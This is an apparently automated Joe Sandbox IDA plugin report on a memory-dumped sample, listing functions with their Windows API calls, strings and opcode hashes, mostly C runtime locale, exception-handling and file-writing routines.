Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271cf4c3461cee5e853b52b322a18ebc5635b642bc758339d1a76fada74582a6
Instruction ID: 0fe7a04b7ca22d425317f8dfdd2cb2a70d88af9f433ab416cbd0aad1813f3258
Opcode Fuzzy Hash: 271cf4c3461cee5e853b52b322a18ebc5635b642bc758339d1a76fada74582a6
Instruction Fuzzy Hash: 2DF012B27246948BDBA58F2EA842B5977D1F34C3C4F908419E79D83B24D63C84618F04

Function 00000001400544CC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86c84702c22ec8ff80f753b0a4c6f97c475feed58590b39074d4851caf5f5588
Instruction ID: e8e3a13c6fd123f72735913cf70b34256a4d81a9b473633b01c1ae1aa77b38bf
Opcode Fuzzy Hash: 86c84702c22ec8ff80f753b0a4c6f97c475feed58590b39074d4851caf5f5588
Instruction Fuzzy Hash: 66A00232114C50E0EB46CF03F8607D03730F35A384F400512F20D470B49B798604C302

Function 0000000140066EE4 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000000140066EFF
try_get_function.LIBVCRUNTIME ref: 0000000140066F1E

Part of subcall function 0000000140067040: GetProcAddress.KERNEL32(?,?,0000000100000007,0000000140066AFE,?,?,?,0000000140065E73,?,?,?,000000014005C2B1), ref: 0000000140067198

try_get_function.LIBVCRUNTIME ref: 0000000140066F3D

Part of subcall function 0000000140067040: LoadLibraryExW.KERNEL32(?,?,0000000100000007,0000000140066AFE,?,?,?,0000000140065E73,?,?,?,000000014005C2B1), ref: 00000001400670E3
Part of subcall function 0000000140067040: GetLastError.KERNEL32(?,?,0000000100000007,0000000140066AFE,?,?,?,0000000140065E73,?,?,?,000000014005C2B1), ref: 00000001400670F1
Part of subcall function 0000000140067040: LoadLibraryExW.KERNEL32(?,?,0000000100000007,0000000140066AFE,?,?,?,0000000140065E73,?,?,?,000000014005C2B1), ref: 0000000140067133

try_get_function.LIBVCRUNTIME ref: 0000000140066F5C

Part of subcall function 0000000140067040: FreeLibrary.KERNEL32(?,?,0000000100000007,0000000140066AFE,?,?,?,0000000140065E73,?,?,?,000000014005C2B1), ref: 000000014006716C

try_get_function.LIBVCRUNTIME ref: 0000000140066F7B
try_get_function.LIBVCRUNTIME ref: 0000000140066F9A
try_get_function.LIBVCRUNTIME ref: 0000000140066FB9
try_get_function.LIBVCRUNTIME ref: 0000000140066FD8
try_get_function.LIBVCRUNTIME ref: 0000000140066FF7
try_get_function.LIBVCRUNTIME ref: 0000000140067016

Strings

EnumSystemLocalesEx, xrefs: 0000000140066F23, 0000000140066F36
LocaleNameToLCID, xrefs: 000000014006701B, 000000014006702E
IsValidLocaleName, xrefs: 0000000140066FBE, 0000000140066FD1
LCIDToLocaleName, xrefs: 0000000140066FFC, 000000014006700F
GetLocaleInfoEx, xrefs: 0000000140066F61, 0000000140066F74
GetTimeFormatEx, xrefs: 0000000140066F80, 0000000140066F93
GetUserDefaultLocaleName, xrefs: 0000000140066F9F, 0000000140066FB2
AreFileApisANSI, xrefs: 0000000140066EF8
LCMapStringEx, xrefs: 0000000140066FDD, 0000000140066FF0
CompareStringEx, xrefs: 0000000140066F04, 0000000140066F17
GetDateFormatEx, xrefs: 0000000140066F42, 0000000140066F55

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 3255926029-3252031757
Opcode ID: d24d3ddb4f627ac26ccc39ac5c642499e78875c40534c4af460c99189a607e52
Instruction ID: 6ff737751394a30045b1b5f93e9d50a3085531f4478606c3009152a1b36049aa
Opcode Fuzzy Hash: d24d3ddb4f627ac26ccc39ac5c642499e78875c40534c4af460c99189a607e52
Instruction Fuzzy Hash: 6A318DB2225A89F1F606DF5AEC11BC42362B39C3C0FD0B42BB709172B5AB388759C351

Function 0000000140064E88 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 297COMMONLIBRARYCODE

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000000140064ED1

Part of subcall function 0000000140064340: _GetEstablisherFrame.LIBVCRUNTIME ref: 0000000140064375
Part of subcall function 0000000140064340: __GetUnwindTryBlock.LIBCMT ref: 0000000140064383
Part of subcall function 0000000140064340: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000001400643A8

IsInExceptionSpec.LIBVCRUNTIME ref: 0000000140064F9B
Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000000140064FA7
pair.LIBVCRUNTIME ref: 0000000140065008
TypeMatchHelper.LIBVCRUNTIME ref: 00000001400650E3
CatchIt.LIBVCRUNTIME ref: 000000014006515E
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000001400651D0
IsInExceptionSpec.LIBVCRUNTIME ref: 0000000140065208
_GetEstablisherFrame.LIBVCRUNTIME ref: 0000000140065222
__FrameHandler3::UnwindNestedFrames.LIBVCRUNTIME ref: 000000014006525A
FindHandlerForForeignException.LIBVCRUNTIME ref: 0000000140065293
__DestructExceptionObject.LIBVCRUNTIME ref: 00000001400652C4
std::bad_alloc::bad_alloc.LIBCMT ref: 00000001400652CD
_CxxThrowException.LIBVCRUNTIME ref: 00000001400652DD

Part of subcall function 0000000140063F94: __vcrt_getptd_noexit.LIBVCRUNTIME ref: 0000000140063F98

Strings

csm, xrefs: 0000000140064F50
csm, xrefs: 0000000140064FC5
csm, xrefs: 0000000140064EEB

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ExceptionFrame$Handler3::Unwind$BlockCatchEstablisherHandlerSpec$DestructExecutionFindForeignFramesHelperIs_bad_exception_allowedMatchNestedObjectSearchStateThrowType__vcrt_getptd_noexitpairstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3809834300-393685449
Opcode ID: 37249e7322de5e9d2dea6941db41d12f2d7c10f07085969c54b2ce9bcd94abaf
Instruction ID: 565a63d43a24f016fc8167999869b500090341069f03cd95eba62aa98838ae32
Opcode Fuzzy Hash: 37249e7322de5e9d2dea6941db41d12f2d7c10f07085969c54b2ce9bcd94abaf
Instruction Fuzzy Hash: 1CD19C32A04A408AEB22EF66D8503DD77A6F76ABC9F200915FF4D67BA9CB34D451C740

Function 0000000140044320 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 253libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000000014004436F
GetModuleHandleW.KERNEL32 ref: 000000014004437F
GetProcAddress.KERNEL32 ref: 000000014004438F

Strings

kernel32.dll, xrefs: 0000000140044378
IsWow64Process, xrefs: 0000000140044385
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0000000140044401
UBR, xrefs: 0000000140044429

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR$kernel32.dll
API String ID: 4190356694-766339376
Opcode ID: 99883ada912d0937351dca55126ae95bfa89433a6e32a9349558c0a4c4e04cd5
Instruction ID: e48e9752cfbbc6661ef9a9066f700dbd2663c54a8a76e8727fd47504fba21806
Opcode Fuzzy Hash: 99883ada912d0937351dca55126ae95bfa89433a6e32a9349558c0a4c4e04cd5
Instruction Fuzzy Hash: 85B1C23260068087FB66CF2AE4443EDB7A1F789798F124125FB9A837E5EB78D580C745

Function 000000014003FA20 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 240COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000014003FBCB

Part of subcall function 0000000140051F60: Concurrency::cancel_current_task.LIBCPMT ref: 0000000140051F90
Part of subcall function 0000000140051F60: Concurrency::cancel_current_task.LIBCPMT ref: 0000000140051F96

Strings

min, xrefs: 000000014003FB13
low, xrefs: 000000014003FCB8
bucket_count, xrefs: 000000014003FB8A
type, xrefs: 000000014003FA79
count, xrefs: 000000014003FD25
max, xrefs: 000000014003FB59
high, xrefs: 000000014003FD00

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn
String ID: bucket_count$count$high$low$max$min$type
API String ID: 4131450254-2045534459
Opcode ID: 7eaeeb57857a2098ffa01fe3f0287bf3b2370b6b6914a3c75333b062263e0a2a
Instruction ID: 79dfcc74de40f30ede9deb13e3a65d3267766817ffcbf78a07641913ed7d2599
Opcode Fuzzy Hash: 7eaeeb57857a2098ffa01fe3f0287bf3b2370b6b6914a3c75333b062263e0a2a
Instruction Fuzzy Hash: C9914776304B8881EA11DB26E4943AE67A1F789FE4F408122EF5E47BA9DF38C545C740

Function 000000014006BF64 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140065CC4: GetLastError.KERNEL32 ref: 0000000140065CCE
Part of subcall function 0000000140065CC4: SetLastError.KERNEL32 ref: 0000000140065D67

TranslateName.LIBCMT ref: 000000014006BFD1
TranslateName.LIBCMT ref: 000000014006C00C
GetACP.KERNEL32(?,?,00000001,?,?,000000014005A8BA), ref: 000000014006C051
IsValidCodePage.KERNEL32(?,?,00000001,?,?,000000014005A8BA), ref: 000000014006C079
wcschr.LIBVCRUNTIME ref: 000000014006C115
wcschr.LIBVCRUNTIME ref: 000000014006C125

Strings

utf8, xrefs: 000000014006C15D

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorLastNameTranslatewcschr$CodePageValid
String ID: utf8
API String ID: 4034593509-905460609
Opcode ID: ece42207757bac4be424211398a930331000e699431f337868e119fce2081aac
Instruction ID: 326dc914b3e1c17784e8b75da76f764109b6b779346b5cd1825a8c37fad84e6d
Opcode Fuzzy Hash: ece42207757bac4be424211398a930331000e699431f337868e119fce2081aac
Instruction Fuzzy Hash: 06617E3231074181FB66AB63DC20BF927A6E74ABC0F648921AF4D4B7E6DB39C591C701

Function 0000000140042C60 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 316threadCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0000000140042CA9

Part of subcall function 00000001400478F0: TlsGetValue.KERNEL32 ref: 0000000140047902

CloseHandle.KERNEL32 ref: 0000000140042C90
GetCurrentThreadId.KERNEL32 ref: 0000000140042D1C
ReleaseSRWLockExclusive.KERNEL32 ref: 0000000140042E11

Part of subcall function 0000000140052130: std::invalid_argument::invalid_argument.LIBCONCRT ref: 000000014005213C
Part of subcall function 0000000140052130: _CxxThrowException.LIBVCRUNTIME ref: 000000014005214D

ReleaseSRWLockExclusive.KERNEL32 ref: 0000000140043039

Strings

list<T> too long, xrefs: 0000000140042E3B

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: CloseExclusiveHandleLockRelease$CurrentExceptionThreadThrowValuestd::invalid_argument::invalid_argument
String ID: list<T> too long
API String ID: 145395645-4027344264
Opcode ID: ccb0abfb3f1e0f2fca9e704b1fde05253c1f145e324a35402a6794255944fb8f
Instruction ID: 5e4d7258678ea50042b1f7ef6e83779c193211595ad7dbdc4b8be2e312f382c4
Opcode Fuzzy Hash: ccb0abfb3f1e0f2fca9e704b1fde05253c1f145e324a35402a6794255944fb8f
Instruction Fuzzy Hash: 8EB1AA32700A8895EB66DB23E9987ED2365F749BD8F844522EF1D0B7A9CF38C546C340

Function 000000014006F334 Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014006F76F

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 43a7542493fe1f72d706ee342c48a5103b36d502fbaaad4aa238d116df6ee87e
Instruction ID: 17c40613a3bcd8f4d750ab5c43cf52618542cf4ad6dbc8f85a09f862eff93223
Opcode Fuzzy Hash: 43a7542493fe1f72d706ee342c48a5103b36d502fbaaad4aa238d116df6ee87e
Instruction Fuzzy Hash: C7C1E27220468045EA629F57A8407FE6BA2F399BD4F654901FB8E077B5CB39C845D700

Function 00000001400166E2 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 218timeCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 000000014001675D
GetLocalTime.KERNEL32 ref: 00000001400167AA
GetTickCount.KERNEL32 ref: 00000001400168F4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000140016A0D

Strings

UNKNOWN, xrefs: 0000000140016945
)] , xrefs: 0000000140016989

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: CountCurrentLocalProcessTickTime_invalid_parameter_noinfo_noreturn
String ID: )] $UNKNOWN
API String ID: 1090144265-712926698
Opcode ID: e3df96e2a67b9e34e63dd0da38268f25a3c6f870c5d6caba2896786dac3042f2
Instruction ID: d8acb2fc6d3e422cf1a5c8b538d37aae67350665917ad124def4406f3c2b67ea
Opcode Fuzzy Hash: e3df96e2a67b9e34e63dd0da38268f25a3c6f870c5d6caba2896786dac3042f2
Instruction Fuzzy Hash: 75916A72700A4085EF06EB77D5A53ED6762AB8DBE8F448512FB1E0B7EADE39C4458340

Function 0000000140073F10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000000140073F41
GetLastError.KERNEL32 ref: 0000000140073F4D
CloseHandle.KERNEL32 ref: 0000000140073F65
CreateFileW.KERNEL32 ref: 0000000140073F90
WriteConsoleW.KERNEL32 ref: 0000000140073FAF

Strings

CONOUT$, xrefs: 0000000140073F71

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 2a994ede47685654324e63ea9a4a28a75d16cbcf5fc74bae8f938567bfc4dfe7
Instruction ID: 76a0248e8ad386ea712736ab7e2f7438b41ac148cb71b6659eff502c3b1b7c16
Opcode Fuzzy Hash: 2a994ede47685654324e63ea9a4a28a75d16cbcf5fc74bae8f938567bfc4dfe7
Instruction Fuzzy Hash: 42115532710A408AE7529B57E854799B3A0FB8CBE4F544225FB5A87BA4DF38CA488740

Function 0000000140015790 Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00000001400157B8
std::_Lockit::_Lockit.LIBCPMT ref: 00000001400157D7
std::_Lockit::~_Lockit.LIBCPMT ref: 0000000140015803
_Getctype.LIBCPMT ref: 00000001400158AC
std::_Facet_Register.LIBCPMT ref: 00000001400158D4
std::_Lockit::~_Lockit.LIBCPMT ref: 00000001400158EE

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 66554026cebdb564a7248274e07cb951346b89d0d22a619380e8b5f20da2ec24
Instruction ID: ab2775aa89306da0b66d0706d3965ff8bc681367857b2ae3a4993955018455a8
Opcode Fuzzy Hash: 66554026cebdb564a7248274e07cb951346b89d0d22a619380e8b5f20da2ec24
Instruction Fuzzy Hash: 0D417732701A8481FA26EB13E5513E963A1FB9CBD4F458126EB4D1BBBADF39C581C700

Function 0000000140014C40 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 322fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 0000000140014F88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001400150F9
CreateFileW.KERNEL32 ref: 000000014001514A
WriteFile.KERNEL32 ref: 000000014001518E

Strings

.tmp, xrefs: 0000000140014D2A

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: File$CreateLongNamePathWrite_invalid_parameter_noinfo_noreturn
String ID: .tmp
API String ID: 1848250347-2986845003
Opcode ID: 72e54bf75cdb8ede5018e73ee5c7d80d4dde2672e1202775e2933ac861dc4f95
Instruction ID: 646c7773dc65d3345d70b80e1d02eee8332c67dc805239ab77b3f5522a34e0c2
Opcode Fuzzy Hash: 72e54bf75cdb8ede5018e73ee5c7d80d4dde2672e1202775e2933ac861dc4f95
Instruction Fuzzy Hash: D8E18E72618AC081EA22DB16E4993DEA361F7C9BD4F404212FB9D0BBA9DF7EC445C740

Function 0000000140048370 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 174stringCOMMON

Download Yara Rule

APIs

strstr.LIBVCRUNTIME ref: 000000014004844A
strstr.LIBVCRUNTIME ref: 000000014004848A

Strings

Collections of histograms for %s, xrefs: 00000001400483A8
Collections of all histograms, xrefs: 00000001400483D6

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
